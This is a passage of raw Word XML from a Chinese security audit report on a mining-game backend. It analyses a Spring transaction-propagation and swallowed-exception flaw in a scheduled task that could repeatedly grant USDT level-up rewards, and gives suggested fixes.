          <w:numId w:val="1245"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">60 秒后同一批矿机再次被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 命中，重复步骤 2-4，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无限循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1246"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户 DB 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 持续保留含充电加速比的虚高值，若该字段被奖励分发逻辑引用，平台持续超额发放收益。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复建议（供参考）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 改为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional(propagation = Propagation.REQUIRES_NEW)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，使其在独立事务中执行，避免异常污染外层事务；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1248"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">或去掉 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，改为手动逐条提交矿机状态重置，将算力重算与状态重置解耦；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">无论采用何种方案，都应记录被吞噬的异常而非 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ignored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，以便监控发现问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（系统内部定时任务）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1251"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：无需外部权限，由系统内部触发</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252"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerScheduler.java.resetExpiredCharging → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</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audit_m264_1126_resetExpiredCharging_ctrl-path1of8.md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：PowerScheduler.java#resetExpiredCharging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_59" w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞58：定时任务 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传播缺陷与异常吞噬导致批次全量回滚、等级升级 USDT 奖励重复发放</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1253"/>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：定时任务事务边界错误——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 静默吞噬内层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rollbackOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标记，调度批次全量回滚后矿机状态未重置，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 每分钟重复触发，存在 USDT 及等级奖励无限重复发放风险</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1254"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（财务奖励实际触发点；根因在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerScheduler.java:resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的事务配置与异常处理）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1255"/>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事务边界错误 / 幂等缺失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1256"/>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57"/>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：无需任何用户操作，定时任务自动触发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PowerScheduler.resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时标注了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Scheduled(fixedRate = 60_000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（外层事务 TX1），负责重置过期充电矿机并触发受影响用户的算力与等级重算。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>核心缺陷在于三者的组合：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1258"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>内层方法 `recalcUserLevelAndHashRate` 也标注了 `@Transactional`（默认 `REQUIRED` 传播）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，它在外层事务已开启时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TX1，而不是创建独立的新事务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1259"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`recalcUserLevelAndHashRate` 内部包含财务写操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp(userId, oldLevel+1, userNewLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService.claimLevelReward(userId, userNewLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，二者在用户等级升级时向用户账户发放 USDT 及实物奖励。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1260"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>外层循环使用 `catch (Exception ignored) {}` 静默吞噬所有异常</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Spring 事务的精确执行顺序如下</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&gt; ① 内层方法（已加入 TX1）抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; ② Spring 事务拦截器拦截到异常，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>已加入的外层事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>txStatus.setRollbackOnly()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（标记 TX1 回滚），然后重新抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; ③ 异常传播至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored) {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被静默捕获——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>但 TX1 的 `rollbackOnly` 标记已不可清除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; ④ 外层方法继续遍历剩余用户，之后正常返回</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; ⑤ Spring 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 代理调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>txManager.commit(TX1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rollbackOnly = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，Spring 抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UnexpectedRollbackException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TX1 整体回滚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">——所有已 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 变更与所有用户等级/算力更新全部撤销</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; ⑥ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
